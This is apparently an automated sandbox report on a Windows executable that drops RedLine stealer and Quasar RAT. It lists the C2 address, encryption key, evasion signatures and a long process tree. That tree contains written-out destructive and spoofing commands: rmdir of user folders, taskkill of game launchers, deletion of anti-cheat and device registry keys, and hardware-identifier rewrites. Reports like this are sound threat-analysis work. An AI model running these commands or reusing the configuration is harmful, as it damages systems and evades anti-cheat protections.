Resubmissions
31/03/2025, 16:47
250331-vak21atwcy 1031/03/2025, 16:04
250331-thy36as1es 1031/03/2022, 10:22
220331-md8cpsada5 10Analysis
-
max time kernel
12s -
max time network
66s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
-
submitted
31/03/2025, 16:04
General
-
Target
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
-
Size
3.6MB
-
MD5
cf56adaf1236aa52a98723c8aa61ff84
-
SHA1
00a517dfa5a9294f5619a7a1d8d0181966692768
-
SHA256
3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88
-
SHA512
2ef67cad31b4792fe066c2cd2f8a745493cf6bd1cab055e689ffa02bb8ec656746f28d06ae0dd6a4a88043c35ac7cf5cc18c3165e81959ef6b6d87ca12a9742b
-
SSDEEP
98304:k5a7Zy+b1yCgWYdhz/tH3ILijJxeWB/5izLurIBQPZJCj:kKA+QWQhLF3ILqJx0zLuL2
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
cheat
C2
85.215.222.129:43240
Extracted
Family
quasar
Version
2.8.0.1
Botnet
Images.exe
C2
85.215.222.129:65535
Mutex
G8fgKgmsR7tqiTolCN
Attributes
-
encryption_key
SLsfHXfM5GTIubFvF50I
-
install_name
Images.exe
-
log_directory
FiveM_Logs
-
reconnect_delay
3000
-
startup_key
Venom Client Startup
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Redline family
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 2 IoCs
-
Sectoprat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 9 IoCs
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Using powershell.exe command.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 11 IoCs
-
Modifies registry class 5 IoCs
-
Modifies registry key 1 TTPs 64 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 52 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exeC:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe bcdedit /c set shutdown /r readonly /f force /t 21⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Color 0b3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im FortniteClient-Win64-Shipping.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im OneDrive.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-23052 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-23055 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple23055-5550-11734-16578 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-23055-%random} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-23055 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-23055 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-23055555011734 /f4⤵
- Enumerates system info in registry
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-23055-5550-1173416578} /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-23055-5550-1173416578 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-23059-16299-295987873 /f4⤵
- Enumerates system info in registry
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-23059-16299-295987873} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-23059-16299-295987873} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&13⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple23059-16299-29598-787310449} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 23059 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 23059 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 23059 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple23062-27047-14694-31936} /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f3⤵
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f3⤵
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic Games /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f3⤵
-
C:\Windows\system32\reg.exeREG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 23062-27047-14694-3193620763 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f3⤵
-
C:\Windows\system32\reg.exereg delete HKCR\com.epicgames.launcher /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\MountedDevices /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-23065-5028-3255923232 /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f4⤵
- Modifies registry key
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f3⤵
-
